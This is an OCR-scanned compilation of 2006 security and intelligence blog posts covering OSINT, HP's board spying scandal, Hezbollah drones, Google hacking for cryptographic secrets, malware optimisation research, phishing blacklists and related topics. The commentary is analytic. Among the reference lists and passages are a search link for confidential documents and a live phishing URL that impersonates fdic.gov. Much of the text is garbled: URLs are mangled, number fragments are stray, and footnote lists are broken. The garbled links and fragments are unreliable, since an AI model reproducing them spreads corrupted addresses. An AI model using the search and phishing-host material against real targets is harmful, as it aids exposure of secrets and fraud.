satellites and aircraft." 


Issues to keep in mind : 
- pre-launch leak in today’s OSINT world 
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- synchronization with HUMINT, SIGINT, OSINT gathered data to avoid deception, some devel- 
opments are right there under your nose 

- [6]Jamateur radio and satellite enthusiasts outwitting the stealthiness as it always happens 

- win-win IMINT sharing between countries can often cover the full spectrum, dependability is 
of course an issue 


Related resources and posts: 

[7]Defense 

[8]Satellite 

[9]Japan’s Reliance on U.S Spy Satellites and Early Warning Missile Systems 
[10]Open Source North Korean IMINT Reloaded 


ti 

2. 

2. 
4. 

5 
6. 
7. 
8. 


ttp://www.stoff.pl1/ 
http://del.icio.us/DDanchev/Defense 
ttp://del.icio.us/DDanchev/Satellite 


9. http: //ddanchev. blogspot .com/2006/07/ japans-reliance-on-us-spy-satellites.htm 


10. http: //ddanchev.blogspot.com/2006/07/open-source-north-korean-imint.htm 


2.9.6 Benefits of Open Source Intelligence - OSINT (2006-09-05 00:49) 
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[1] Surprisingly, Forbes, the homepage for the world’s business 
leaders - and wannabe ones - has a well written article on [2]Open Source Intelligence you 
might find informative : 


"How can we use this to reform intelligence? | suggest we create a national Open Source 
Agency. Half of the money earmarked for the agency would go toward traditional intelligence 
work. The other half would provide for 50 state-wide Citizen Intelligence Networks, including a 
24/7 watch center, where citizens can both obtain and input information. We could establish 
new emergency intelligence phone numbers-think 119 instead of 911-allowing any housewife, 
cab driver or delivery boy to contribute to our national security. All they have to do is be 
alert, and if they see something, take a cell phone photograph and send it in with a text 
message. If three different people notice the same suspicious person taking photographs of 
a nuclear plant, for instance, it could be hugely important. The system could even evolve to 
automatically mobilize emergency workers or warn citizens. Imagine if after people alerted 
the network about a roadside car bomb, it automatically sent text messages to every phone 
in the immediate area, warning people to stay away." 
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Collective intelligence, wisdom of crowds - [3]Web users were supposed to virtually patrol 
the U.S border once - all is driving Web 2.0, trouble is so is paranoia, and all paranoid people 
need is a platform to spread it further, but the article emphasises on how educated citizens 
can be the best defense. [4]The benefits of OSINT according the CIA themselves are based on: 


Speed: When a crisis erupts in some distant part of the globe, in an area where estab- 
lished intelligence assets are thin, intelligence analysts and policymakers alike will often turn 
first to the television set and Internet. 


Quantity: There are far more bloggers, journalists, pundits, television reporters, and 
think-tankers in the world than there are case officers. While two or three of the latter may, 
with good agents, beat the legions of open reporters by their access to secrets, the odds are 
good that the composite bits of information assembled from the many can often approach, 
match, or even surpass the classified reporting of the few. 


Quality: As noted above, duped intelligence officers at times produce reports based on 
newspaper clippings and agent fabrications. Such reports are inferior to open sources un- 
tainted by agent lies. 


Clarity: An analyst or policymaker often finds even accurate HUMINT a problem. For 
example, when an officer of the CIA’s Directorate of Intelligence (DI), reads a report on 
a foreign leader based on “a source of unproven reliability,” or words to that effect, the 
dilemma is clear. Yet, the problem remains with a report from a “reliable source.” Who is 
that? The leader’s defense minister? The defense minister’s brother? The mistress of the 
defense minister’s brother’s cousin? The DI analyst will likely never know, for officers of the 
Directorate of Operations (DO) closely guard their sources and methods. This lack of clarity 
reportedly contributed, for example, to the Iraqi WMD debacle in 2002-03. The DO reportedly 
described a single source in various ways, which may have misled DI analysts into believing 
that they had a strong case built on multiple sources for the existence of Iraqi weapons of 
mass destruction. With open information, sources are often unclear. With secrets, they almost 
always are. 


Ease of use: Secrets, hidden behind classifications, compartments, and special access 
programs, are difficult to share with policymakers and even fellow intelligence officers. All 
Officials may read OSINT. 


Cost: A reconnaissance satellite, developed, launched, and maintained at a cost of bil- 
lions of dollars, can provide images of a weapons factory’s roof or a submarine’s hull. A 
foreign magazine, with an annual subscription cost of $100, may include photographs of that 
factory’s floor or that submarine’s interior 


Meanwhile, [5]Intelligence analysts are putting efforts into [6]sharing their data, [7]data 
mining the web [8]Jand social networking sites which is both, cost-effective and can greatly 
act as an early warning system for important events. Despite technological innovations, a 
blogger in an adversary’s country can often unknowingly act as a HUMINT source of first-hand 
information - looking for [9]democracy minded individuals breaking through regimes through 
malware is yet another possibility. [10]Tracking down terrorist propaganda and [11]commu- 
nications on the Internet has already reached the efficiency level mainly because of the use 
of open source intelligence and [12]web crawling the known [13]bad neighborhoods ever 
[14]since 2001. 
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Related resources and posts: 

[15]Intelligence 

[16]OSINT 

[17]IP cloaking and competitive intelligence/disinformation 
[18]Terrorist Social Network Analysis 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/info_sharing. jpg 
2 


ttp://www.forbes.com/2006/04/15/open-source-intelligence_cx_rs_06slate_0418steele.htm 


. http: //news.bbc.co.uk/1/hi/world/americas/5040372.stm 


. https://www.cia.gov/csi/studies/Vol49n02/reexamining the_distinction_3.ht 


3 
4 
5, http: //ddenchev.blogepot .con/2006/06/analyzing-intelligence- analyte. neal 
6, http://aiv.vashingtonpost. con/p-dyn/content/graphic/2006/08/09/6K2006080500190.héal 
7 
8 
9 


. http: //www.newscientist.com/article/mg19025556 . 2007DCMP=NLC-nletterknsref=mg19025556. 200 


. http: //www.defenselink.mil/transformation/articles/2006-06/ta062906b. htm 


ttp://www.ravantivirus.com/virus/showvirus.php?v=216 


10. http://ddanchev.blogspot .com/2006/06/tracking-down-internet-terrorist.htm 
11. http: //ddanchev.blogspot.com/2006/08/cyber-terrorism-communications-and_22.htm 


. http: //ai.arizona.edu/research/terror/publications/ISI_AILab_submission_final.pdf 


http: //tajdeed-list.net/pipermail/pir_tajdeed-list.net/2006-June/000092.htm 


http: //www.epic.org/privacy/choicepoint/acxiominternet . pdf 


| http: //éel.Acio us/DDanchev/ Intel igencs 
16, hep: //del. Scio. us/DDanchev/0S1¥T 

| http: //adanchey blogspot. con/2006/12/ip-cloaking-and- competitive, bial 

_ http: //adanchev blogspot. con/2006/05/terrorsat~social-network- analysis tal 


2.9.7 HP Spying on Board of Directors’ Phone Records (2006-09-06 17:33) 


[1] * Whether a [2]healthy paranoia, or a series of detailed leaks to the press on HP’s future 
long term strategy, it prompted [3]HP’s chair woman to hire experts that obtained access 
to the call histories of its board of directors’ home and cell phone communications thinking 
possible [4]insiders : 


"Last January, the online technology site CNET published an article about the long-term 
strategy at HP, the company ranked No. 11 in the Fortune 500. While the piece was upbeat, it 
quoted an anonymous HP source and contained information that only could have come from 
a director. HP’s chairwoman, Patricia Dunn, told another director she wanted to know who 
it was; she was fed up with ongoing leaks to the media going back to CEO Carly Fiorina’s 
tumultuous tenure that ended in early 2005. According to an internal HP e-mail, Dunn then 
took the extraordinary step of authorizing a team of independent electronic-security experts 
to spy on the January 2006 communications of the other 10 directors-not the records of calls 
(or e-mails) from HP itself, but the records of phone calls made from personal accounts. That 
meant calls from the directors’ home and their private cell phones." 


The case highlights that : 

- Classification programs type of protection is rarely utilized of companies aiming to balance 
the trade off of achieving productivity while keep the left hand not knowing what the right 
is doing when it’s necessary - remember it’s [5]the HP way and the management by open 
spaces that made the company what it is today 
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- Didn’t bother to disinform suspicious parties and decoy them, thus limiting the circle of 
"suspects" 

- Didn’t build transparency into the process and that’s just starting to make impact 

- It’s shorthsighted thinking on whether the information defined as leaked wasn’t [6]Jeasy to 
construct through public sources, or that the internal changes weren’t already spotted by 
industry analysts 

- They’re about to lose their current talanted HR, and the one that was about to join HP. Soft 
HR dollars are on stake, as | can imagine what will be the faith of a HP blogger if that’s how 
board of directors members threat each other 


Here’s the [7]Jarticle of question, and what provoked this to happen : 


"According to the source, HP is considering making more acquisitions in the infras- 
tructure software arena. Those acquisitions would include security software companies, 
storage software makers and software companies that serve the blade server market. The 
acquisitions would dovetail with HP’s growth plans for its Technology Systems Group, which 
has already bought companies such as [8]AppI/Q for storage management. Hurd has previously 
said market trends indicate a movement away from mainframe computers and a shift to blade 
servers, as well as virtualized storage. HP is likely to follow those trends. Meanwhile, in 
HP’s Imaging & Printing Group, the long-term plan to develop commercial printers is likely to 
continue. "We want to develop the next Heidelberg press," the source said. Of course, HP 
said basically [9|the same thing back in 2002." 


In a previous post, [10]When Financial and Information Security Risks are Supposed to 
Intersect, | commented on Morgan Stanley’s case of knowing who did what, and the growing 
enforcement of security policies, thus firing employees violating them by forwarding sensitive 
information to home email accounts. But with the media trying to generate buzz while keeping 
it objective by mentioning its "sources" and putting the emphasise on "inside company source" 
no wonder HP is thinking insiders, rather than talkative directors who when asked does the Sun 
come out in the morning and goes down in the evening, would think twice before answering - 
and question the question itself! 


[11]Privacy monster courtesy of the EFF. 


Related resources and posts: 

[12]Espionage 

[13]Insider 

[14]Wiretapping 

[15]Surveillance 

[16]Smoking Emails 

[17]Insider Competition in the Defense Industry 
[18]Espionage Ghosts Busters 


ttp://photos1.blogger .com/blogger/1933/1779/1600/ouch.4. jpg 
ttp://ddanchev.blogspot.com/2006/05/healthy-paranoia. html 
ttp://www.msnbc.msn.com/id/14687677/site/newsweek/ 


ttp://www.hpalumni.org/hp_way.htm 
ttp://ddanchev .blogspot.com/2006/09/benefits-of-open-source-intelligence.htm 
ttp://news.com.com/HPtoutlinestlong-term+strategy/2100-1014_3-6029519. htm 


1. 
2. 
3. 
4. http://ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible. html 
5. 
6. 
7. 
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8. http: //news.com. com/HP+to+acquire+tidentity+management+firm/2100-1014_3-5976834.html?tag=n 


9. http: //news .com. com/HP+pressing+for+more+printer+business/2100-1001_3-963469 .html?tag=n 


10, http; //ddancher.blogepot .con/2006/07 /shen~financial~and~ inforeat ion. heal] 
| http: //avy off org/Privacy/Monsters/ 
| http: //del. icio us/DDanchev/Bspionagd 
13, http: //del, icio.us/DDanchev/ Insider 
| http: //delAcio us/DDanchev/Wiretapping 
| http: //4el..4cio.us/DDanchev/Surveillancd 
| http://adanchey blogspot. con/2006/02/snoking-enails. btn 


. http: //ddanchev.blogspot.com/2006/05/insider-competition-in-defense.htm 


18. http: //ddanchev. blogspot .com/2006/05/espionage-ghosts-busters.htm 


2.9.8 Hezbollah’s use of Unmanned Aerial Vehicles - UAVs (2006-09-06 19:36) 


[1] * According to the common wisdom, terrorists - or let’s just say contradictive political 
fractions - weren’t supposed to be capable of owning the using [2]unmanned aerial vehicles 
in war conflicts, but be only able to wage guerilla warfare thus balancing the unequal forces 
in a conflict. Seems like [3]Hezbollah are indeed capable of owning and using UAVs, as Israel 
recently shot down yet another one : 


"Israeli aircraft shot down an unmanned spy plane launched by the Lebanese guerrilla 
group Hizbollah as it entered Israeli territory on Monday, the Israeli army said. The drone was 
spotted by the air force’s monitoring unit and fighter planes were scrambled to intercept it, 
an Israeli military spokesman said. The spokesman said a fighter plane shot the drone down 
10 km (six miles) off Israel’s coast, northwest of the city of Haifa. "The current assessment is 
that it was headed further south, we do not know exactly for what purpose," the spokesman 
said. An Israeli military source added that it was an Iranian-made drone with a range of about 
150 km." 


Go through an in-depth post at [4]DefenseTech, and Eugene Miasnikov’s report on [5]Threat 
of Terrorism Using Unmanned Aerial Vehicles: Technical Aspects, which : 


"assesses the technical possibility of UAV use as a delivery means for terrorists. The 
analysis shows that such a threat does exist and that it will grow. The author also considers 
areas that require higher attention from government agencies. This report is also targeted at 
the Russian public. Terrorist activity can be prevented only through the coordinated efforts of 
the government and civil society. The government cannot efficiently fight terrorists without 
the active involvement of the population. The first step toward creating such an alliance is to 
recognize the threat and its potential consequences." 


So what’s next once reconnaissance is taken care of and timely intelligence gathered? 
[6]UCAVs in the long term, of course. Nothing’s impossible, the impossible just takes a little 
while! 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/predator_01. jpg 


2. http: //en.wikipedia.org/wiki/Unmanned_aerial_vehicle 


3. http://today.reuters.co.uk/news/articlenews .aspx?type=worldNewskstory1ID=2006-08-07T214710Z_01_L07879623_R 


RUKOC_O_UK-MIDEAST- ISRAEL-DRONE. xm 
4. http://www.defensetech. org/archives/002369.htm 
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5. http://www.armscontrol.ru/UAV/report .htm 


6. http://en.wikipedia. org/wiki/Unmanned_Combat_Air_Vehicle 


2.9.9 Google Hacking for Cryptographic Secrets (2006-09-07 19:10) 


[1] * Interesting perspective, for sure could prove handy on a [2]nation-wide scale. The 
concept of [3]googling for private keys has been around for quite a while, and here’s an 
informative paper emphasising on how [4]Google can Reveal Cryptographic Secrets taking 
the topic even further : 


"Google hacking is a term to describe the search queries that find out security and pri- 
vacy flaws. Finding vulnerable servers and web applications, server fingerprinting, accessing 
to admin and user login pages and revealing username-passwords are all possible in Google 
with a single click. Google can also reveal secrets of cryptography applications, i.e., clear 
text and hashed passwords, secret and private keys, encrypted messages, signed messages 
etc. In this paper, advanced search techniques in Google and the search queries that reveal 
cryptographic secrets are explained with examples in details." 


Comments on : Hashed passwords, Secret Keys, Public Keys, Private Keys, Encrypted 
Files, Signed Messages - external comments on [5]packed binary patterns, [6]malware 
functions, and the [7]malware search engine itself. 


[8]Google is so not the root of the problem, althrough at least theoretically [9]malicious 
web crawling is indeed possible. Seems like patterns come useful to both sides of the front - 
[10]Jand [11]everyone in between. 


1. http://photos1.blogger .com/blogger/1933/1779/1600/malicious_crawler.0. jpg 


ttp://ddanchev .blogspot.com/2006/05/nation-wide-google-hacking-initiative.htm 


ttp://johnny.ihackstuff.com/index. php?module=prodreviews&func=showcontentkid=364 


ttp://th.informatik.uni-mannheim.de/people/tatli/pub/ghack_crypto.pdf 


2 
3 
4. 
5 

6. http: //asert .arbornetworks.com/2006/07/googling- for-malware-bobbing-for-mass-mailers/ 
7 

8 

9 

10. 


11. http://www. google. com/search?hl=en&q=confidential+/22dotnott+distribute{22 


2.9.10 Benchmarking and Optimising Malware (2006-09-08 03:43) 


[1] *® With the [2]growth and diversity of today’s malware, performance criteria for a 
malicious code is reasonably neglected as a topic of interest, but that shouldn’t be the case, 
as "the enemy you know is better than the enemy you don’t know". As information warfare 
and malware often intersect for the purpose of balancing asymmetric forces, or conducting 
espionage, there’re already research initiatives for [3]multi-platform, multi-communication- 
environment code. 

José M. Fernandez and Pierre-Marc Bureau constructively build awareness on how "the best is 
yet to come" in their research on [4]Optimising Malware : 
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"In this paper, we address and defend the commonly shared point of view that the worst 
is very much yet to come. We introduce an aim-oriented performance theory for malware 
and malware attacks, within which we identify some of the performance criteria for mea- 
suring their “goodness” with respect to some of the typical objectives for which they are 
currently used. We also use the OODA-loop model, a well known paradigm of command and 
control borrowed from military doctrine, as a tool for organising (and reasoning about) the 
behavioural characteristics of malware and orchestrated attacks using it. We then identify 
and discuss particular areas of malware design and deployment strategy in which very little 
development has been seen in the past, and that are likely sources of increased future 
malware threats. Finally, we discuss how standard optimisation techniques could be applied 
to malware design, in order to allow even moderately equipped malicious actors to quickly con- 
verge towards optimal malware attack strategies and tools fine-tuned for the current Internet." 


They’ve successfully distinguished the following generic and specific aim-oriented perfor- 
mance criteria : 


Generic 

- Number of hosts 
- Persistence 

- Anonymity 


Fraud 
- Money 
- Credibility 


Information theft 

- Penetration 

- Stealth 

- Amount of information 
- Host location 


Access sale 
- Upstream bandwidth 
- Security 


Destruction 

- Propagation 

- Upstream bandwidth 
- Host location 

- Damage 


Information Warfare 
- Speed 

- Host Location 

- Damage 

- Exposure 


Taking into consideration the [5]OODA loop concept - Observation, Orientation, Decision, 
Action - the characteristics would get definitely improved with the time. 
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Related resources and recent posts: 

[6]Malware 

[7]Virus Outbreak Response Time 

[8]Malware Bot Families - Technology and Trends 
[9]Malware Statistics on Social Networking Sites 


. http://photos1. blogger .com/blogger/1933/1779/1600/Malicious_Pacman.0. jpg 
. http: //www.linuxsecurity.com/docs/malware-trends.pd 

; 

. http://www.scs.carleton.ca/~dsg/dss/materials/dss_paper_20060131.pdf 

. http: //en.wikipedia. org/wiki/0O0DA_Loop 

. http: //del.icio.us/DDanchev/Malware 

. http://ddanchev. blogspot .com/2006/08/virus- outbreak-response-time.htm 


. http: //ddanchev. blogspot .com/2006/08/virus- outbreak-response-time.htm 
. http: //ddanchev.blogspot.com/2006/08/malware-statistics-on-social.htm 


OMAN ADU BWN FE 


2.9.11 Email Spam Harvesting Statistics (2006-09-08 04:25) 


* [1]Web application email harvesting has always represented an untapped threat, and it’s 
not the basics of parsing or web application vulnerabilities | have in mind, but the already 
stored, in-transit, and saved contacts by infected people and their (insecure) platforms. 


[2]Malware is already averaging 1 piece in 600 social networking pages, which isn’t surprising 
and is greatly proportional with the rise of [3]web application vulnerabilities. Compared to 
[4]personal data security breaches capable of providing the freshest and most recent emails 
of the parties involved, thus reseting a spammer’s activities lifecycle, web email harvesting is 
still a rather common event. 


Thankfully, there’re already scaled initiatives such as the [5]Distributed Spam Harvester 
Tracking Network making an impact : 


"Project Honey Pot is the first and only distributed system for identifying soammers and 
the spambots they use to scrape addresses from your website. Using the Project Honey Pot 
system you can install addresses that are custom-tagged to the time and IP address of a 
visitor to your site. If one of these addresses begins receiving email we not only can tell that 
the messages are spam, but also the exact moment when the address was harvested and the 
IP address that gathered it. 


To participate in Project Honey Pot, webmasters need only install the Project Honey Pot 
software somewhere on their website. We handle the rest — automatically distributing 
addresses and receiving the mail they generate. As a result, we anticipate installing Project 
Honey Pot should not increase the traffic or load to your website." 


Some current project statistics: 

- Spam Trap Addresses Monitored - 1,354,582 
- Total Spam Received - 1,464,090 

- Total Spam Servers Identified - 499,310 

- IPS Monitored - 611,368 
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- Total Harvesters Identified - 10,653 


[6]Donate a MX record, or get yourself [7]Jan account and start contributing. On the 
other hand, the host that’s web crawling for fresh emails today, will definitely match with the 
one found in a phishing email at a later stage - the growing transparency and the pressure 
put on spammers inevitably results in the Ecosystem | mentioned in my [8]Malware - Future 
Trends research. 


Related posts: 

[9]The Beauty of the Surrealistic Spam Art 
[10]Real-Time PC Zombie Statistics 

[11]The current state of IP spoofing 
[12]Dealing with Spam - The O’Reilly.com Way 


1. http: //ddanchev. blogspot .com/2006/06/web-application-email-harvesting-worm.htm 


2 
3 
a 

5 

6 

7 

8. 

9. 

10. http: //ddanchev.blogspot .com/2006/06/real-time-pc-zombie-statistics.htm 
1 
12. 


2.9.12 A Study on The Value of Mobile Location Privacy (2006-09-08 16:18) 


[1] ™ Right in between [2]Flickr’s introduction of geotagging, the term stalkerazzi got its 
necessary attention, then again it entirely depends on you to evolve as a Web 2.0 user and 
add more value to the ongoing folksonomy, or realize the possible privacy implications. 


Yesterday, Danezis Cvrcek and Matyas Kumpost released an interesting [3]study on The 
Value of Location Privacy : 


"This paper introduces results of a study into the value of location privacy for individu- 
als using mobile devices. We questioned a sample of over 1200 people from five EU 
countries, and used tools from experimental psychology and economics to extract 
from them the value they attach to their location data. We compare this value across 
national groups, gender and technical awareness, but also the perceived difference between 
academic use and commercial exploitation. We provide some analysis of the self-selection 
bias of such a study, and look further at the valuation of location data over time using data 
from another experiment." 


[4]While there’re indeed [5]privacy issues related to mobile devices, in the age of mal- 
ware authors purchasing commercial IP Geolocation services to get a better grasp of the 
infected sample, and [6]Google’s growing concern on the use of networks such as Tor mimick- 
ing possible malicious bahavior you should ask yourself, what is it that you’re trying to achive, 
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[7]Anonymity or Privacy preservation online and go for it without feeling like a hostage. 


1. http://photos1.blogger .com/blogger/1933/1779/1600/nakedsurfer-01. jpg 


2. http://blog.wired.com/monkeybites/index.blog?entry_id=1546974 


3. http://www.buslab.org/index.php/component/option, com_remository/Itemid, 33/func, fileinfo/id, 163/parent, cat 
4. http://www. geekzone . co.nz/content .asp?contentid=6628 

5. http://ddanchev.blogspot .com/2006/03/privacy-issues-related-to-mobile-and.htm 

6. http://www. boingboing. net/2006/09/07/google_blocking_priv.html 

7. hp: ddanchev. blogspot. con/2006/0%/anonynity-or~privacy-on~ internet. al 


2.9.13 The Freedom Tower - 11th September 2006 (2006-09-11 20:57) 


[1] ™ That’s of course [2]how it’s gonna look like in 2012 - true leaders never look into the 
past, they’re too busy defining the future. Time goes fast given you’re busy and always up 
to something - disruption! | still clearly remember the moment when 9/11 happened and 
realize how much I’ve changed since then. Mixed thoughts started buzzing around my mind, 
the type of thoughts [3]Cryptome’s Daily Photos smartly emphasises on. Anyway, someone 
or something always has to, either be the result, the consequence, or the foundation for the 
next stage. I'll leave it open to interpretations on what interacts with what : 


Cold War <=> Defense/Intelligence spending/Innovation <=> Post 9/11 World 

Terrorist <=> Ideology <=> War 

Foreign policy <=> Terrorism <=> Geopolitical dominance 

Terrorism <=> OSINT <=> Intelligence 

Civil Liberties <=> Terrorism <=> Surveillance 

Poverty <=> G8 <=> Developed world 

Space exploration budget cuts <=> Terrorism <=> Alternative energy sources development 
Paranoia <=> Terrorism <=> Security services/products market growth 


| can keep on going, but that’s not the point, the point is how globalisation is acting as 
a double edged sword, and so is paranoia, still, Keep in mind that there’re [4]Jone million other 
ways to get killed compared to a terrorist attack. 


There’ve always been and will always be "bad guys", "good guys", and "greyhat guys" - 
barking dogs of course - trouble is knowing whom to trust at a particular moment in time. 
| can easily argue that during the past five years, all the "bad guys" had to do was to 
go through the press and come up "future long term strategies" perceptional enough to 
shock and awe "the infidels". My point is that, OSINT is also a double edged sword, useful and 
dangerous to both parties. As far as the infidels are concerned, I’m not one - | believe in myself! 


Underestimating an adversary is much worse than overestimating it, just cut using ter- 
rorism as the excuse for everything you do, or are about to do, which is as subjective as 
China’s economy taking over the world - something neither the "bad guys" nor China would do. 


Related posts: 

[5]Terrorism 

[6]Data mining, terrorism and security 
[7]Terrorist Social Network Analysis 
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[8]Benefits of Open Source Intelligence - OSINT 
[9]Visualization, Intelligence and the Starlight project 
[10]Cyber terrorism - don’t stereotype and it’s there! 
[11]Cyber terrorism - recent developments 

[12]Arabic Extremist Group Forum Messages’ Characteristics 
[13]Tracking Down Internet Terrorist Propaganda 

[14]Cyber Terrorism Communications and Propaganda 
[15]Steganography and Cyber Terrorism Communications 


1 ftp: //photost blogger. con/blogger/1988/1778/1600/Freedon.jpd 
_ http: / blog. wired, con/freedontover/ 

_http://eryptone .org/caphotost 

_ http: //sww. wired. con/nevs/technology/0, 7474-0. tml 

| http://4e).icio us/DDanchev/Terrorisn 


http: //ddanchev. blogspot .com/2006/03/data-mining-terrorism-and-security.htm 


http: //ddanchev. blogspot .com/2006/05/terrorist-social-network-analysis.htm 


. http: //ddanchev. blogspot .com/2006/09/benefits-of-open-source-intelligence.htm 
. http: //ddanchev. blogspot .com/2006/01/visualization-intelligence-and.htm 


OMNAUARWN 


. http: //ddanchev.blogspot.com/2005/12/cyberterrorism-dont-stereotype-and-its.htm 


11. http: //ddanchev.blogspot.com/2006/01/cyberterrorism-recent-developments. htm 
12. http: //ddanchev.blogspot .com/2006/05/arabic-extremist-group-forum-messages.htm 
13. http: //ddanchev. blogspot . com/2006/06/tracking-down-internet-terrorist.htm 


. http: //ddanchev.blogspot .com/2006/08/cyber-terrorism-communications-and_22.htm 


15. http: //ddanchev.blogspot.com/2006/08/steganography-and-cyber-terrorism.htm 


2.9.14 NSA’s Terrorist Records Database (2006-09-11 20:59) 


[1] 

SSN 3B2-29-XXXX 

Phone Calls Date City Country Who Phone Number Duration 
25 Nov 2004 AlKhar Saudi Arabia 2992 gis puto} Juss B7234XX 00:46:56 
27 Oct 2004 Aden Yemen 4&1 dy 42 415 S0586XX 00:30:41 
12 Nov 2003 ElOued Algeria pal ae ghumey 68378XX 00:13:37 

Emails Date From/To Who Email Subject 
01 Jun 2006 From 2 dolls pools XXXXKAKAKCORARAXAKAK.2G 
17 May 2006 From Gype Gae Ques hs Jd XXKXKAKMEDKKXKXX. I = 
23 Mar 2006 From Jad ae XXKXK OK AKKAKAKX. SI = 
30 Nov 2005 To ds caBa (furl XXAAXAXAKOAAKK. CH = 
15 Aug 2005 To dig) 998 yo gli le XXXKDXXXXXX.Ga ot 
18 May 2005 To jdabl ye 95S ele XXXAXAXXXNEDX, Ib = 


** This information is not displayed for privacy purposes 
Threat Analysis Based on the destination and duration of phone calls and email messages sent 
and received, this individual is considered to be a low risk of terrorist threat. 
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Right on time! Inside sources - this is a creative spoof - at the NSA finally coordinated their 
intelligence sharing efforts with the [2]Patriot Search, and came up with a public [3]database 
giving you the opportunity to lookup your entire neighborhood for suspicious relations with 
the Middle East. 


What’s the bottom line? [4]Keep your friends close, your intelligence buddies closer! 
Interested in [5]Anti-Terror tips? Follow these : 


- Use email software with strong encryption to prevent terrorists from reading your email 

- Encrypt the files on your computer using strong encryption such as PGP to prevent terrorists 
from accessing your files 

- Browse the web using an anonymous proxy to prevent terrorists from seeing what sites you 
visit 

- Insist that electronic voting machines provide you with a traceable paper receipt so you can 
ensure that terrorists haven’t altered the electronic ballot 

- Report all behavior, especially if it is suspicious 


1, ft tip://photost blogger. con/blogger/1988/1778/1600/terrorist_database_hoax jpg 
2. http: //blog. outer-court .com/patriot / 

3, heep://wiy neste org 

4, http://adanchey blogspot .con/2008/0% /keep- your~friends-close-your tall 

5, heep://wiv.neate org/*ipe. pha 


2.9.15 Secret CIA Prisons (2006-09-11 21:02) 


[1 


— 


According to government statements, US planes carrying suspected 
terrorists crossed Danish airspace about 20 times. 


UZBEKISTAN 


Kabul 


AFGHANISTAN 


It’s official, [2]there’re indeed (publicly) secret CIA prisons, and a public commitment towards 
improvement : 


"All suspects will now be treated under new guidelines issued by the Pentagon on Wednesday, 
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which bring all military detainees under the protection of the Geneva Convention. The move 
marks a reversal in policy for the Pentagon, which previously argued that many detainees 
were unlawful combatants who did not qualify for such protections. The new guidelines forbid 
all torture, the use of dogs to intimidate prisoners, water boarding - the practice of submerging 
prisoners in water - any kind of sexual humiliation, and many other interrogation techniques." 


| assume operating such facilities in the Twilight Zone is flexible from an interrogation 
point of view, what makes me wonder though is how [3]justified kidnappings of alleged 
terrorists by recruiting local intelligence agents are. Guess a guy | had a hot discussion with 
the other night was right, no more Russian skirmishes in guerilla warfare, the adversary 
leaders just dissapear and no one, even their forces ever hear anything of them - spooky 
special forces stealing the hive’s queen. 


In case you're also interested in [4]DoD’s New Detainee Interrogation Policy, it’s already 
available at the FAS’s blog, plus [5]"biographies" of 14 detainees. 


However, there’s one thing the entire [6]synthetic community would always be thankful 
to the CIA though, and that’s [7]the LSD, a proven "[8]ice breaker" during the decades. 


Graph courtesy of Spiegel.de 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/United_Intelligence_Airlines. jpg 


2 
3 

4 
B: 

6 

7 

8. 


ttp://www.totse.com/en/politics/central_intelligence_agency/ciacid.htm 


2.9.16 Visualizing Enron’s Email Communications (2006-09-12 05:33) 


[1] * In a previous post "[2]There You Go With Your Financial Performance Transparency" | 
mentioned the release of [3]Enron’s email communications between 2000/2002, mind you, 
by Enron’s ex-risk management provider. Continuing the series of resourceful posts on 
[4]visualizing terrorists, [5]intelligence data sharing, [6]security and new media, here’s Jeffrey 
Heer’s [7]visual data mining of Enron’s email communications sample : 


"Using the Enron e-mail archive as a motivating dataset, we are attempting the mar- 
riage of visual and algorithmic analyses of e-mail archives within an exploratory data analysis 
environment. The intent is to leverage the characteristic strengths of both man and machine 
for unearthing insight. Below are a few sketches from a preliminary exploration into the 
design space of such tools." 


And here’s how he [8]visualized the social network, invaluable "big picture". 


1. http: //photos1.blogger.com/blogger/1933/1779/1600/med_search3_california_ferc.png 


2. http: //ddanchev. blogspot .com/2006/06/there-you-go-with-your-financial.htm 


3. http://www. enronemail.com/ 
4. http: //ddanchev. blogspot .com/2006/05/terrorist-social-network-analysis.htm 
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5. http://ddanchev.blogspot.com/2006/01/visualization-intelligence-and.htm 


6. http: //ddanchev. blogspot .com/2006/03/visualization-in-security-and-new.htm 
7. http://jheer .org/enron/ 
8. http://jheer.org/enron/v1/ 


2.9.17 Google Anti-Phishing Black and White Lists (2006-09-13 02:08) 


[1] * Can the world’s most effective search engine manage to keep [2]questionable sites 
away from the search results of its users? Seems like its toolbar users are also [3]warned 
about such. Google for sure got the widest and most recent snapshot of the Web to draw 
up conclusions from, and seems like starting from the basics of keeping a black and white 
list with questionable sites/URLs is still taken into consideration. Googling Google proves 
handy sometimes and you can stumble upon interesting findings such as Google’s [4]Black - 
[5]cache version - and [6]White lists of phishing and possible fraudelent sites - there’s still a 
[7]cached version of the White list available and the [8]white domains as well. 


As | often say that the [9]host trying to 6667 its way out of the network today, will be 
the one sending phishing and spam mails tomorrow, therefore in order to verify | took a 
random blacklisted host such as [10]http://219.255.134.12/fdic.gov/index.html.html and 
decided to first test it at [11]TrustedSource, and of course, at the [12]SORBS to logically figure 
out that the host’s has been indeed : 


"Spam Sending Trojan or Proxy attempted to send mail from/to from= to=" 


What’s ruining the effect of black and white lists? With today’s [13]modular malware - 
and [14]DIY phishing toolkits - the list of IP’s currently hosting phishing sites can become a 
decent time-consuming effort to keep track of, namely black lists can be sometimes rendered 
useless given how malware-infected hosts increasingly act as spamming, phishing, and 
botnet participating ones - if ISPs were given the incentives or obliged to take common sense 
approaches for dealing with malware infected hosts, it would make a difference. As far as the 
white lists are concerned, [15]XSS vulnerabilities on the majority of top domains, and browser 
specific vulnerabilities make their impact, but most of all, it’s a far more complex issue than 
black and white only. 


Another recent and free initiative | came across to, is the [16]Real-Time Phishing Sites 
Monitor, which may prove useful to everyone interested in syndicating their findings. 


[17]Third-party anti-phishing toolbars, as well as anti-phishing features build within pop- 
ular toolbars are not the panacea of dealing with phishing attacks. A combination of them and 
user awareness, thus less gullible user is the way. 


1. http://photos1. blogger .com/blogger/1933/1779/1600/scam. jpg 
2. http: //www.stopbadware.org/ 
3. http: //img217. imageshack. us/img217/7352/googlefraudwh7 . png 


. http://sb.google.com/safebrowsing/update?version=goog-black-url:1:-1 


ttp://64.233.161.104/search?q=cache: kLfqknC7pgYJ:sb. google.com/safebrowsing/update/3Fversion/,3Dgoog-black 
url:1:-1+site:sb.google.comtpaypal .com&hl=en&ct=clnk& 


url:1:-1+site:sb.google.comtpaypal . comkhl=enkamp ; ct=c 


ttp://sb.google.com/safebrowsing/update?version=goog-white-domain:1:-1 


8. 
9, ictp://Adenchev. blogspot .con/2006/02/nasver~of~infected- puppets. heal 
0 LG. i ‘ ; 

.org 

lookup.shtm 


